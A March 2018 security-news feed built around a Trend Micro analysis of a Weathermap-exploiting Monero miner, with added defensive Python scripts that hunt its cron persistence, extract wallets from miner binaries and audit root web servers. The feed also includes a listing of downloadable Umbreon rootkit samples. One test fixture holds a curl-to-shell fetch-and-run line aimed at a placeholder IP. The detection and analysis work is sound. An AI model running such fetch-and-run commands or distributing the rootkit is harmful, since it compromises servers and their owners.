
Police ask Google for location data to narrow suspect lists

Police intend to use location data from Google to work out which devices were being used near the scene of crimes.

Posted: 21 Mar 2018 | 6:50 am

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

Legitimate, large-scale cryptocurrency mining operations invest in dedicated hardware and pay for the electricity needed to turn a profit. This has not escaped the attention of cybercriminals: malicious cryptocurrency mining was so pervasive last year that it was the most detected network event on devices connected to home routers.

Through our incident response-related monitoring, we observed intrusion attempts whose indicators we’ve been able to correlate to a previous cryptocurrency-mining campaign that used the JenkinsMiner malware. The difference: this campaign targets Linux servers. It’s also a classic case of reused vulnerabilities, as it exploits a rather outdated security flaw whose patch has been available for nearly five years.

Feedback from Trend Micro’s Smart Protection Network indicates it’s an active campaign, primarily affecting Japan, Taiwan, China, the U.S., and India.

Figure 1. Network intrusion attempts observed from the cryptocurrency-mining campaign (December 2017 to mid-March 2018)

Figure 2. Country distribution of the malicious cryptocurrency-mining campaign

Attack chain analysis
This campaign’s operators were exploiting CVE-2013-2618, a dated vulnerability in Cacti’s Network Weathermap plug-in, which system administrators use to visualize network activity. As to why they’re exploiting an old security flaw: Network Weathermap only has two publicly reported vulnerabilities so far, both from June 2014. It’s possible these attackers are taking advantage not only of a security flaw for which an exploit is readily available but also of patch lag that occurs in organizations that use the open-source tool.

Figure 3. Threat indicators showing how the Weathermap vulnerability is exploited

From the request in Figure 3:

  1. The blurred part is the target web server and port.
  2. The file /plugins/weathermap/configs/conn.php is the file written as a result of the persistent cross-site scripting (XSS) on /plugins/weathermap/php.
  3. The ideal targets are Linux web servers (although Cacti and the plug-in can be installed on Windows as well).

Aside from the initial conn.php, we observed a similar HTTP request targeting a page called ‘cools.php’:

Figure 4. A similar HTTP request to cools.php

As seen above, these commands would be executed:

The watchd0g.sh file contains the following code:

Figure 5. Code snapshot of watchd0g.sh

An entry written to /etc/rc.local makes watchd0g.sh execute every time the system boots, and a modification to /etc/crontab runs watchd0g.sh every three minutes. The script sets the Linux kernel parameter vm.nr_hugepages to the value recommended for mining Monero (XMR). It also makes sure the process it launches is running, re-downloading and executing the file if it has terminated.

Its main purpose is to download another file, dada.x86_64 (detected by Trend Micro as COINMINER_MALXMR.SM-ELF64), from the same server from which watchd0g.sh was retrieved.
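The persistence just described is easy to hunt for across a fleet of Linux web servers. The following Python script is an added example for this page, not Trend Micro's code: it flags /etc/crontab and /etc/rc.local entries that fetch something from a remote host, hand it to a shell, re-run every few minutes or execute from a scratch directory, and reads back vm.nr_hugepages. The crontab, rc.local and sysctl text it runs on is constructed; the IP address in it is a placeholder and the /tmp path is an assumption, since the post does not say where watchd0g.sh is written.

```python
"""Hunt for the cron/rc.local persistence and the hugepages change described
above. Added example, not Trend Micro's tooling. Sample inputs are constructed;
198.51.100.23 is a placeholder and /tmp/watchd0g.sh is an assumed path."""
import re
from dataclasses import dataclass, field

FETCH = re.compile(r"\b(?:curl|wget)\b")
REMOTE = re.compile(r"(?:https?|ftp)://\S+|\b(?:\d{1,3}\.){3}\d{1,3}\b")
TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b|\b(?:ba)?sh\s+(?:-c\b|\S*\.sh\b)")
SCRATCH = re.compile(r"/(?:tmp|var/tmp|dev/shm)/")
HUGEPAGES = re.compile(r"vm\.nr_hugepages\s*=\s*(\d+)")


@dataclass
class Finding:
    source: str
    line: str
    reasons: list = field(default_factory=list)


def _command_reasons(cmd: str) -> list:
    reasons = []
    if FETCH.search(cmd) and REMOTE.search(cmd):
        reasons.append("fetches from a remote host")
    if TO_SHELL.search(cmd):
        reasons.append("hands the result to a shell")
    if SCRATCH.search(cmd):
        reasons.append("runs from a world-writable directory")
    return reasons


def scan_system_crontab(text: str) -> list:
    """/etc/crontab format: minute hour dom month dow user command."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # comments and SHELL=/PATH= assignments
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        minute, user, cmd = parts[0], parts[5], parts[6]
        reasons = _command_reasons(cmd)
        every = re.fullmatch(r"\*/(\d+)", minute)
        if every and int(every.group(1)) <= 5:
            # a watchdog re-run every few minutes is how the miner restarts itself
            reasons.append(f"re-executes every {every.group(1)} minutes")
        if reasons and user == "root":
            reasons.append("runs as root")
        if reasons:
            findings.append(Finding("/etc/crontab", line, reasons))
    return findings


def scan_rc_local(text: str) -> list:
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line == "exit 0":
            continue
        reasons = _command_reasons(line)
        if reasons:
            findings.append(Finding("/etc/rc.local", line, reasons))
    return findings


def hugepages_setting(sysctl_text: str) -> int:
    """Value of vm.nr_hugepages from `sysctl vm.nr_hugepages` output (0 = kernel default)."""
    m = HUGEPAGES.search(sysctl_text)
    return int(m.group(1)) if m else 0


# Constructed sample input: one benign cron line and one in the campaign's pattern.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/3 *   * * *   root    /bin/sh /tmp/watchd0g.sh >/dev/null 2>&1
"""
SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
curl -fsSL http://198.51.100.23/watchd0g.sh -o /tmp/watchd0g.sh && sh /tmp/watchd0g.sh
exit 0
"""
SAMPLE_SYSCTL = "vm.nr_hugepages = 128\n"

if __name__ == "__main__":
    for f in scan_system_crontab(SAMPLE_CRONTAB) + scan_rc_local(SAMPLE_RC_LOCAL):
        print(f"{f.source}: {f.line}\n    " + "; ".join(f.reasons))
    if hugepages_setting(SAMPLE_SYSCTL):
        print("vm.nr_hugepages is non-default:", hugepages_setting(SAMPLE_SYSCTL))
```

On a live host, feed it the contents of /etc/crontab and /etc/rc.local and the output of `sysctl vm.nr_hugepages`. A non-zero hugepages value on a machine that was never configured for it is a cheap tell, because the miner sets it for its own benefit; user crontabs under /var/spool/cron have no user field and need a five-field parser instead.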

Analyzing the Linux XMRig miner
The final payload (dada.x86_64 as of 01/28/2018, earlier named xig or nkrb) is a modified XMRig miner. XMRig is a legitimate, open-source XMR miner that is actively updated and has builds for 32-bit and 64-bit Windows and Linux. When run from the command line, XMRig displays the following:

Figure 6. dada.x86_64 executed via command line

XMRig is normally run with a configuration file, config.json, or with command-line parameters that specify details such as the hashing algorithm (CryptoNight/CryptoNight-Lite), maximum CPU usage, mining server (pool), and login credentials (the Monero wallet as the username, plus a password). The samples used in this attack were modified so that no configuration file or parameters are needed: everything is embedded in the binary. Most samples also do not print the command-line banner.

Figure 7. Parameters supposedly specified/required by the miner

Following the Monero trail
We gathered five possible samples that led us to two unique login usernames, matching the Monero wallets where the mining pool payments are sent.

The attackers mined approximately 320 XMR or about $74,677 (as of March 21, 2018) based on the two wallets. Note that this is only a small portion of the profit for this entire campaign. Earlier reports of the same campaign uncovered $3 million worth of XMR from a single Monero wallet.

SHA256 | Mining Server | Username (Monero wallet) | Password
690aea53dae908c9afa933d60f467a17ec5f72463988eb5af5956c6cb301455b | pool[.]minexmr[.]com:443 | 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL | x
48cf0f374bc3add6e3f73f6db466f9b62556b49a9f7abbcce068ea6fb79baa04 | pool[.]supportxmr[.]com:80 | 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL | x
1155fae112da3072d116f39e90f6af5430f44f78638db3f43a62a9037baa8333 | xmr[.]krbpool[.]com:443 | 45AarDcdcDXXdT7aRt2dpoMwQdEj4WzLyS5YvD4zDBYRLQFKxudkJMdR98RmyqmSdD4gR4hZusqwmfk7gF439YmzCnFmKDj | x
2c7b1707564fb4b228558526163249a059cf5e90a6e946be152089f0b69e4025 | pool[.]supportxmr[.]com:80 | 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL | x
d814bf38f5cf7a58c3469d530d83106c4fc7653b6be079fc2a6f73a36b1b35c6 | pool[.]supportxmr[.]com:80 | 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL | x

Figure 8. Samples containing the Monero wallets
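Because the configuration is compiled into the sample, the pool and wallet can be read straight out of the binary's strings, which is how a table like the one above is built in practice. The following Python is an added example for this page, not Trend Micro's tooling: it reimplements the strings extraction, pulls out host:port pairs and Monero addresses by format, and checks them against the two wallets listed in Figure 8. The ELF-like byte blob it scans is constructed; it embeds those two addresses and two of the pools from the table. Address checksums are not validated (that requires Keccak-256, which the Python standard library lacks).

```python
"""Recover the mining configuration compiled into a miner binary: pool
host:port and the Monero address used as the pool login. Added example, not
Trend Micro's tooling. Format checks only; no checksum validation."""
import re

B58 = r"[1-9A-HJ-NP-Za-km-z]"          # Monero uses the Bitcoin base58 alphabet
# Standard address: '4' + 94 chars; integrated: '4' + 105; subaddress: '8' + 94.
XMR_ADDRESS = re.compile(
    rf"(?<!{B58})(?:4{B58}{{105}}|4{B58}{{94}}|8{B58}{{94}})(?!{B58})")
POOL = re.compile(
    r"(?:stratum\+(?:tcp|ssl)://)?"
    r"((?:(?:\d{1,3}\.){3}\d{1,3}|(?:[a-z0-9-]+\.)+[a-z]{2,})):(\d{2,5})\b", re.I)
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")

# From Figure 8 above: the wallets the campaign's samples log in with.
CAMPAIGN_WALLETS = {
    "42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL",
    "45AarDcdcDXXdT7aRt2dpoMwQdEj4WzLyS5YvD4zDBYRLQFKxudkJMdR98RmyqmSdD4gR4hZusqwmfk7gF439YmzCnFmKDj",
}


def strings(blob: bytes) -> list:
    """Printable ASCII runs of 4+ bytes, like `strings -n 4`."""
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(blob)]


def extract_mining_config(blob: bytes) -> dict:
    """Every pool endpoint and Monero address found in the binary's strings."""
    wallets, pools = set(), set()
    for s in strings(blob):
        wallets.update(XMR_ADDRESS.findall(s))
        pools.update(f"{host}:{port}" for host, port in POOL.findall(s))
    return {"wallets": sorted(wallets), "pools": sorted(pools)}


def campaign_hits(config: dict) -> list:
    """Extracted wallets that match the campaign's known ones."""
    return sorted(set(config["wallets"]) & CAMPAIGN_WALLETS)


# Constructed stand-in for a stripped miner: an ELF magic, some ordinary
# loader strings, and the embedded pool/login arguments the page describes.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"/lib64/ld-linux-x86-64.so.2\x00GNU/Linux 2.6.18\x00"
    + b"-o stratum+tcp://pool.supportxmr.com:80\x00"
    + b"-u 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL\x00"
    + b"-p x\x00xmr.krbpool.com:443\x00"
    + b"45AarDcdcDXXdT7aRt2dpoMwQdEj4WzLyS5YvD4zDBYRLQFKxudkJMdR98RmyqmSdD4gR4hZusqwmfk7gF439YmzCnFmKDj\x00"
)

if __name__ == "__main__":
    cfg = extract_mining_config(SAMPLE_BLOB)
    print(cfg)
    print("campaign wallets present:", campaign_hits(cfg))
```

Run it over `open(path, "rb").read()` for any unexpected ELF found under /tmp or a web root. Addresses that pass the format check but are not on the list are still worth keeping: the pool's public stats page for an address usually shows hashrate and payout history, which is how the post arrived at its 320 XMR estimate.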

Conclusion and mitigation
The campaign’s attack chain requires the following:

The first two are almost a given, but the last three raise eyebrows: Why would one want to share network data publicly (Cacti)? Is the web server really being run as ‘root’?

Cacti data should be kept internal to the environment and never exposed to the internet. Exposing it is a serious operational-security risk: what lets systems or network administrators conveniently monitor their environment (from a browser bookmark, for instance) does the same for threat actors. Whatever monitoring tool is used, the system it runs on should be hardened against compromise and abuse, and the web server should not run as root. Keeping systems updated with the latest patches (or employing virtual patching for legacy systems and networks) also raises the cost for potential attackers.
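The question "is the web server really being run as root?" can be answered from a process listing and is worth scripting across a fleet. The following Python is an added example for this page, not from the post: it reads `ps -eo user=,pid=,ppid=,comm=` output, separates a web server's master process (root is normal there, to bind port 80) from its workers (which should have dropped privileges), and reports servers whose workers run as root or which never drop privileges at all. The listing it parses is constructed.

```python
"""Check whether web-server request handlers run as root. Added example, not
from the Trend Micro post. The process listing below is constructed."""
import subprocess
from collections import defaultdict

WEB_SERVERS = ("apache2", "httpd", "nginx", "php-fpm", "lighttpd")


def server_name(comm: str):
    """Canonical server name for a ps COMMAND value, or None (php-fpm7.4 -> php-fpm)."""
    base = comm.rsplit("/", 1)[-1]
    for name in WEB_SERVERS:
        if base.startswith(name):
            return name
    return None


def parse_ps(ps_text: str) -> dict:
    """pid -> (user, ppid, comm) from `ps -eo user=,pid=,ppid=,comm=` output."""
    procs = {}
    for line in ps_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4 and parts[1].isdigit() and parts[2].isdigit():
            user, pid, ppid, comm = parts
            procs[int(pid)] = (user, int(ppid), comm.strip())
    return procs


def audit_web_workers(ps_text: str) -> dict:
    """Per server: root masters, root workers, unprivileged workers. A worker is
    a process whose parent is a process of the same server."""
    procs = parse_ps(ps_text)
    report = defaultdict(lambda: {"root_masters": 0, "root_workers": 0,
                                  "unprivileged_workers": 0})
    for pid, (user, ppid, comm) in procs.items():
        name = server_name(comm)
        if name is None:
            continue
        parent = procs.get(ppid)
        is_worker = parent is not None and server_name(parent[2]) == name
        if is_worker:
            report[name]["root_workers" if user == "root" else "unprivileged_workers"] += 1
        elif user == "root":
            report[name]["root_masters"] += 1
    return dict(report)


def root_exposed(report: dict) -> list:
    """Servers whose request-handling processes have root's power: any root
    worker, or a root master that never forked an unprivileged worker."""
    return sorted(name for name, c in report.items()
                  if c["root_workers"] or (c["root_masters"] and not c["unprivileged_workers"]))


def live_report() -> dict:
    ps = subprocess.run(["ps", "-eo", "user=,pid=,ppid=,comm="],
                        capture_output=True, text=True, check=True)
    return audit_web_workers(ps.stdout)


# Constructed listing: Apache drops to www-data as it should; php-fpm does not.
SAMPLE_PS = """\
root        1     0 systemd
root      812     1 apache2
www-data  815   812 apache2
www-data  816   812 apache2
root      901     1 php-fpm7.4
root      905   901 php-fpm7.4
root      906   901 php-fpm7.4
"""

if __name__ == "__main__":
    report = audit_web_workers(SAMPLE_PS)
    for name, counts in sorted(report.items()):
        print(name, counts)
    print("handlers running as root:", root_exposed(report))
```

A root php-fpm pool is exactly the condition under which the Weathermap file write turns into a root shell; the fix is the `user`/`group` directives in the pool configuration, and on the Apache side the `User`/`Group` directives, after which the weathermap configs directory should be writable by nobody but the administrator.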

A proactive incident response strategy that includes actively hunting and responding to threats also helps provide more visibility into attacks that may be overlooked by traditional security solutions. Identifying the techniques also empowers organizations with actionable intelligence that can help create stronger benchmarks for response.

Trend Micro™ Deep Discovery™ provides detection, in-depth analysis, and proactive response to attacks using exploits and other similar threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update. Trend Micro™ Deep Discovery Inspector™ protects customers from this attack via this DDI rule:

Trend Micro™ Deep Security and Vulnerability Protection protect users from threats that may target the aforementioned vulnerability (or use XSS) via the following DPI rules:

Trend Micro™ TippingPoint™ customers are protected from the aforementioned threat via this MainlineDV filter:

Indicators of Compromise
Trend Micro also identified the attacking IP addresses. However, because these machines appear to be compromised hosts under remote control rather than attacker-owned infrastructure, listing them would not be worthwhile. Our research also led us to a possible tool written in Python that was used in this campaign, identified by the HTTP User-Agent ‘python-requests/2.18.4’ (the default User-Agent of the Python requests library, version 2.18.4).

Related Hashes:

SHA256 | Description
4a70da8ad6432d7aa639e6c5e0c03958eebb3728ef89e74c028807dd5d68e2b4 | Bourne-Again shell script, ASCII text executable
0adadc3799d06b35465107f98c07bd7eef5cb842b2cf09ebaeaa3773c1f02343 | ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=7b9059fbf5f223af2bf1d83251d640e0f60bbe00, stripped
d814bf38f5cf7a58c3469d530d83106c4fc7653b6be079fc2a6f73a36b1b35c6 | ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=5722b052bfd047b57ec3710dd948bfc9ee7d7316, stripped
7f30ea52b09d6d9298f4f30b8045b77c2e422aeeb84541bb583118be2425d335 | ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9bc00ee0d5261d8bb29b753b8436a1c54bd19c94, stripped
690aea53dae908c9afa933d60f467a17ec5f72463988eb5af5956c6cb301455b | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, stripped
1155fae112da3072d116f39e90f6af5430f44f78638db3f43a62a9037baa8333 | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, stripped
2c7b1707564fb4b228558526163249a059cf5e90a6e946be152089f0b69e4025 | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, stripped
48cf0f374bc3add6e3f73f6db466f9b62556b49a9f7abbcce068ea6fb79baa04 | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, stripped

IP Addresses and URLs related to the malicious/modified XMRig Miner:


Posted: 21 Mar 2018 | 5:01 am

Creaking Chromebooks getting Meltdown protection soon

Chrome OS 66 to protect older Intel units, still working on ARM

Older Chromebook owners should keep an eye open for Chrome OS updates, because Google has announced they'll get Meltdown protection soon.…

Posted: 20 Mar 2018 | 8:58 pm

EDR – Not just for Large Enterprises?

When you think of Endpoint Detection and Response (EDR) tools, do you envision a CSI-style crime lab with dozens of monitors and people with eagle-eye views of what their users and defenses are doing? For many, the idea of EDR seems like something for “the big players” with teams of highly trained people. That impression comes from how these tools were built and presented in days gone by; it is no longer true.

What Changed?

For starters, threats changed, and with them the need to investigate each one to prevent a repeat of an outbreak or breach. Put simply, malware and attack methods became smarter, and stopping them became much more difficult. Threats don’t always look like threats anymore. The same attack might arrive through the web or email, as a different file type with a different name, but with the same intent: avoid detection and compromise your endpoints.

Defenses have evolved as well, but as part of that growth another problem grew with it. More defenses means more reports, alerts and places to go to investigate and then remediate a threat. Economically, most organizations have not put more staff into the mix alongside this change. The “do more with less” mantra hasn’t left the minds of many, and the result is too many security practitioners drowning in noise and overwhelmed with management tools and data. Perhaps that’s why so many resort to simply re-imaging a machine instead of investigating or remediating a threat. It seems easier (and it probably is) for many. See our infographic ‘A Return to Endpoint Protection Platforms’ for more on how the use of disparate point tools increases operational complexity.

Lastly, the need to do things differently became clear. The latest Gartner Market Guide for Endpoint Detection and Response shows a strong shift in the number of organizations that now consider EDR a need and plan to invest in it. Security practitioners are shifting gears as the nature of threats changes and as they need to know how a threat arrived, what it attempted to do, and where else it may have attempted entry.

It Doesn’t Have to Take a Village Anymore

Something else changed as the landscape evolved: EDR solutions became easier and simpler to work with. EDR is no longer a tool that requires a dozen people or a Security Operations Center (SOC). Dashboard-style management with prioritized, at-a-glance data has replaced lengthy reports and overwhelming alert volume. More integrated approaches have also cut down manual processes, replacing them with automated responses and automatic contextual insights. This also cuts complexity when delivered as part of an Endpoint Protection Platform (EPP). For more details, watch a video on the role of EDR and Machine Learning and the Return to Endpoint Protection Platform Suites.

It no longer requires extensive training or expertise to use and realize value from EDR solutions. Security Practitioners can now simply log in, click to the heart of a threat and remediate it in a short period of time. Remediation can happen in as little as one click and setting traps, triggers and responses for future threats takes only a few minutes.

McAfee offers an integrated EDR solution that gives prioritized data and alerts with a dashboard view of your environment and makes it easy to click to the eye of a threat in seconds. One of our customers was able to go from using spreadsheets and manual processes to getting data in seconds.

If you’re ready to see how easy and effective EDR can be, check out this video to see a Metasploit attack halted with a straight forward investigation.

The post EDR – Not just for Large Enterprises? appeared first on McAfee Blogs.

Posted: 20 Mar 2018 | 3:19 pm

Rootkit Umbreon / Umreon - x86, ARM samples

Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems
Research: Trend Micro

There are two packages: the full 'found in the wild' set, and the set of files whose hashes are listed in the Trend Micro article (all but one of those files are already in the full package).


Download (email me if you need the password)

File information

Part one (full package)

# | File Name | MD5 | File Size (on Disk) | Duplicate?
1 | .umbreon-ascii | 0B880E0F447CD5B6A8D295EFE40AFA37 | 6085 bytes (5.94 KiB)
2 | autoroot | 1C5FAEEC3D8C50FAC589CD0ADD0765C7 | 281 bytes
3 | CHANGELOG | A1502129706BA19667F128B44D19DC3C | 11 bytes
4 | cli.sh | C846143BDA087783B3DC6C244C2707DC | 5682 bytes (5.55 KiB)
5 | hideports | D41D8CD98F00B204E9800998ECF8427E | 0 bytes | Yes, of file promptlog
6 | install.sh | 9DE30162E7A8F0279E19C2C30280FFF8 | 5634 bytes (5.5 KiB)
7 | Makefile | 0F5B1E70ADC867DD3A22CA62644007E5 | 797 bytes
8 | portchecker | 006D162A0D0AA294C85214963A3D3145 | 113 bytes
9 | promptlog | D41D8CD98F00B204E9800998ECF8427E | 0 bytes
10 | readlink.c | 42FC7D7E2F9147AB3C18B0C4316AD3D8 | 1357 bytes (1.33 KiB)
11 | ReadMe.txt | B7172B364BF5FB8B5C30FF528F6C5125 | 2244 bytes (2.19 KiB)
12 | setup | 694FFF4D2623CA7BB8270F5124493F37 | 332 bytes
13 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes | Yes, of file spytty.sh
14 | umbreon.c | 91706EF9717176DBB59A0F77FE95241C | 1007 bytes
15 | access.c | 7C0A86A27B322E63C3C29121788998B8 | 713 bytes
16 | audit.c | A2B2812C80C93C9375BFB0D7BFCEFD5B | 1434 bytes (1.4 KiB)
17 | chown.c | FF9B679C7AB3F57CFBBB852A13A350B2 | 2870 bytes (2.8 KiB)
18 | config.h | 980DEE60956A916AFC9D2997043D4887 | 967 bytes
19 | config.h.dist | 980DEE60956A916AFC9D2997043D4887 | 967 bytes | Yes, of file config.h
20 | dirs.c | 46B20CC7DA2BDB9ECE65E36A4F987ABC | 3639 bytes (3.55 KiB)
21 | dlsym.c | 796DA079CC7E4BD7F6293136604DC07B | 4088 bytes (3.99 KiB)
22 | exec.c | 1935ED453FB83A0A538224AFAAC71B21 | 4033 bytes (3.94 KiB)
23 | getpath.h | 588603EF387EB617668B00EAFDAEA393 | 183 bytes
24 | getprocname.h | F5781A9E267ED849FD4D2F5F3DFB8077 | 805 bytes
25 | includes.h | F4797AE4B2D5B3B252E0456020F58E59 | 629 bytes
26 | kill.c | C4BD132FC2FFBC84EA5103ABE6DC023D | 555 bytes
27 | links.c | 898D73E1AC14DE657316F084AADA58A0 | 2274 bytes (2.22 KiB)
28 | local-door.c | 76FC3E9E2758BAF48E1E9B442DB98BF8 | 501 bytes
29 | lpcap.h | EA6822B23FE02041BE506ED1A182E5CB | 1690 bytes (1.65 KiB)
30 | maps.c | 9BCD90BEA8D9F9F6270CF2017F9974E2 | 1100 bytes (1.07 KiB)
31 | misc.h | 1F9FCC5D84633931CDD77B32DB1D50D0 | 2728 bytes (2.66 KiB)
32 | netstat.c | 00CF3F7E7EA92E7A954282021DD72DC4 | 1113 bytes (1.09 KiB)
33 | open.c | F7EE88A523AD2477FF8EC17C9DCD7C02 | 8594 bytes (8.39 KiB)
34 | pam.c | 7A947FDC0264947B2D293E1F4D69684A | 2010 bytes (1.96 KiB)
35 | pam_private.h | 2C60F925842CEB42FFD639E7C763C7B0 | 12480 bytes (12.19 KiB)
36 | pam_vprompt.c | 017FB0F736A0BC65431A25E1A9D393FE | 3826 bytes (3.74 KiB)
37 | passwd.c | A0D183BBE86D05E3782B5B24E2C96413 | 2364 bytes (2.31 KiB)
38 | pcap.c | FF911CA192B111BD0D9368AFACA03C46 | 1295 bytes (1.26 KiB)
39 | procstat.c | 7B14E97649CD767C256D4CD6E4F8D452 | 398 bytes
40 | procstatus.c | 72ED74C03F4FAB0C1B801687BE200F06 | 3303 bytes (3.23 KiB)
41 | readwrite.c | C068ED372DEAF8E87D0133EAC0A274A8 | 2710 bytes (2.65 KiB)
42 | rename.c | C36BE9C01FEADE2EF4D5EA03BD2B3C05 | 535 bytes
43 | setgid.c | 5C023259F2C244193BDA394E2C0B8313 | 667 bytes
44 | sha256.h | 003D805D919B4EC621B800C6C239BAE0 | 545 bytes
45 | socket.c | 348AEF06AFA259BFC4E943715DB5A00B | 579 bytes
46 | stat.c | E510EE1F78BD349E02F47A7EB001B0E3 | 7627 bytes (7.45 KiB)
47 | syslog.c | 7CD3273E09A6C08451DD598A0F18B570 | 1497 bytes (1.46 KiB)
48 | umbreon.h | F76CAC6D564DEACFC6319FA167375BA5 | 4316 bytes (4.21 KiB)
49 | unhide-funcs.c | 1A9F62B04319DA84EF71A1B091434C64 | 4729 bytes (4.62 KiB)
50 | cryptpass.py | 2EA92D6EC59D85474ED7A91C8518E7EC | 192 bytes
51 | environment.sh | 70F467FE218E128258D7356B7CE328F1 | 1086 bytes (1.06 KiB)
52 | espeon-connect.sh | A574C885C450FCA048E79AD6937FED2E | 247 bytes
53 | espeon-shell | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB)
54 | espeon.c | 499FF5CF81C2624B0C3B0B7E9C6D980D | 14899 bytes (14.55 KiB)
55 | listen.sh | 69DA525AEA227BE9E4B8D59ACFF4D717 | 209 bytes
56 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes
57 | ssh-hidden.sh | AE54F343FE974302F0D31776B72D0987 | 127 bytes
58 | unfuck.c | 457B6E90C7FA42A7C46D464FBF1D68E2 | 384 bytes
59 | unhide-self.py | B982597CEB7274617F286CA80864F499 | 986 bytes
60 | listen.sh | F5BD197F34E3D0BD8EA28B182CCE7270 | 233 bytes

part 2 (those listed in the Trend Micro article)
# | File Name (SHA256) | MD5 | File Size (on Disk)
1 | 015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28ac | A47E38464754289C0F4A55ED7BB55648 | 9375 bytes (9.16 KiB)
2 | 0751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53a | F9BA2429EAE5471ACDE820102C5B8159 | 7512 bytes (7.34 KiB)
3 | 0a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes
4 | 0ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ff | B982597CEB7274617F286CA80864F499 | 986 bytes
5 | 122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e8670 | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB)
6 | 409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64a | B4746BB5E697F23A5842ABCAED36C914 | 6149 bytes (6 KiB)
7 | 4fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234 | D0D97899131C29B3EC9AE89A6D49A23E | 65160 bytes (63.63 KiB)
8 | 8752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784 | E7E82D29DFB1FC484ED277C702187818 | 55564 bytes (54.26 KiB)
9 | 991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b73088522 | 2B1863ACDC0068ED5D50590CF792DF05 | 7664 bytes (7.48 KiB)
10 | a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddf | A977F68C59040E40A822C384D1CEDEB6 | 176 bytes
11 | aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809b | DF320ED7EE6CCF9F979AEFE451877FFC | 26 bytes
12 | acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa4525 | 84D552B5D22E40BDA23E6587B1BC532D | 6852 bytes (6.69 KiB)
13 | c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480 | 087DD79515D37F7ADA78FF5793A42B7B | 11184 bytes (10.92 KiB)
14 | e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853 | BBEB18C0C3E038747C78FCAB3E0444E3 | 71940 bytes (70.25 KiB)

Posted: 20 Mar 2018 | 6:29 am

Equifax breach could be most costly in corporate history

NEW YORK/TORONTO (Reuters) – Equifax Inc (EFX.N) said it expects costs related to its massive 2017 data breach to surge by $275 million this year, suggesting the incident at the credit reporting bureau could turn out to be the most costly hack in corporate history.

The projection, which was disclosed on a Friday morning earnings conference call, is on top of $164 million in pretax costs posted in the second half of 2017. That brings expected breach-related costs through the end of this year to $439 million, some $125 million of which Equifax said will be covered by insurance.

